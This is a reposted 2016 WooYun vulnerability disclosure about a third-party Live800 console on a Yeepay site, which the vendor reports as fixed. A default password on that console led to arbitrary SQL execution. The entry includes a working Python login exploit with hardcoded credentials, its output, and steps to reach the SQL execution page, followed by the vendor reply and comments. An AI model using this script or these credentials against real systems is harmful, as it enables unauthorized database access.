支付安全之易宝支付某站默认口令导致任意SQL语句执行(附脚本)

admin

139598
文章

114
评论

2017年5月3日06:11:44评论340 views字数 234阅读0分46秒阅读模式

摘要

2016-04-17：细节已通知厂商并且等待厂商处理中
2016-04-17：厂商已经确认，细节仅向厂商公开
2016-04-27：细节向核心白帽子及相关领域专家公开
2016-05-07：厂商已经修复漏洞并主动公开，细节向公众公开

漏洞概要关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-197322

漏洞标题：支付安全之易宝支付某站默认口令导致任意SQL语句执行(附脚本)

漏洞作者：路人甲

提交时间： 2016-04-17 13:07

修复时间： 2016-05-07 11:33

公开时间： 2016-05-07 11:33

漏洞类型： SQL注射漏洞

危害等级：高

自评Rank： 15

漏洞状态：厂商已经修复

漏洞来源：www.wooyun.org ，如有疑问或需要帮助请联系

Tags标签：无

6人收藏

漏洞详情

披露状态：

简要描述：

详细说明：

问题站点：http://online.yeepay.com

详情看： WooYun: Live800在线客服系统默认密码导致的SQL查询/SQL注射漏洞

验证脚本

code 区域

#!/usr/bin/python
 # -*- coding: utf-8 -*-
 
 import requests
 import sys
 
 headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36'}
 
 def getsessionid(url):
     url = url + "/live800/console/console.jsp"
     req = requests.get(url, allow_redirects=False)
     status = req.status_code
     #print status
     if status == 302:
         sessionid = req.headers['Set-Cookie'][11:43]
         print 'sessionid为：' + sessionid
         return  sessionid
     else:
         print '漏洞不存在！'
         return '1'
 
 def loginin(url, sessionid):
     url = url + '/live800/console/console.jsp?login=' + sessionid
     data = {'iamkevin': 'wuxiaohong', 'companyId': '123', 'userName': 'kevin', 'password': 'wuTAO198403242337'}
     cookies = {'JSESSIONID': sessionid}
     try:
         req = requests.post(url, data=data, cookies=cookies, headers=headers, allow_redirects=False)
         if req.status_code == 302:
             print '登录成功: ' + req.headers['Location']
         else:
             print '漏洞不存在！'
     except Exception, e:
         print e
 
 url = 'http://online.yeepay.com'
 se = getsessionid(url)
 loginin(url, se)

sessionid为：676A30044A32E4D2172A59F565C6BDB3

登录成功: http://online.yeepay.com/live800/console/main.jsp

获得的sessionid为有效的sessionid，利用该sessionid登录

查看配置信息：

进入数据库检查页面

用户和密码为：kevin/wuTAO198403242337

登陆后填写JNDI名称： jdbc/live800_im_crm

接下来就可以执行任何sql语句了：

点到为止，不爆数据了。

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

危害等级：中

漏洞Rank：5

确认时间：2016-04-17 18:35

厂商回复：

感谢您的提交，我们已联系厂商升级。

漏洞评价：

对本漏洞信息进行评价，以更好的反馈信息的价值，包括信息客观性，内容是否完整以及是否具备学习价值

漏洞评价(共0人评价):

登陆后才能进行评分

评价

2016-04-18 00:02 | 邪少 ( 实习白帽子 | Rank:98 漏洞数:18 | 百里长苏)

1

厂商不是你们自己么

1# 回复此人
2016-05-07 11:34 | 易宝支付(乌云厂商)

0

@邪少是第三方系统

2# 回复此人
2016-05-07 20:40 | 我叫金挖挖 ( 路人 | Rank:15 漏洞数:5 | 一个搞电力的业余玩家)

0

我竟然看成了支付宝。

3# 回复此人

漏洞概要 关注数(12) 关注此漏洞

缺陷编号： WooYun-2016-197322

漏洞标题： 支付安全之易宝支付某站默认口令导致任意SQL语句执行(附脚本)

相关厂商： 易宝支付

漏洞作者： 路人甲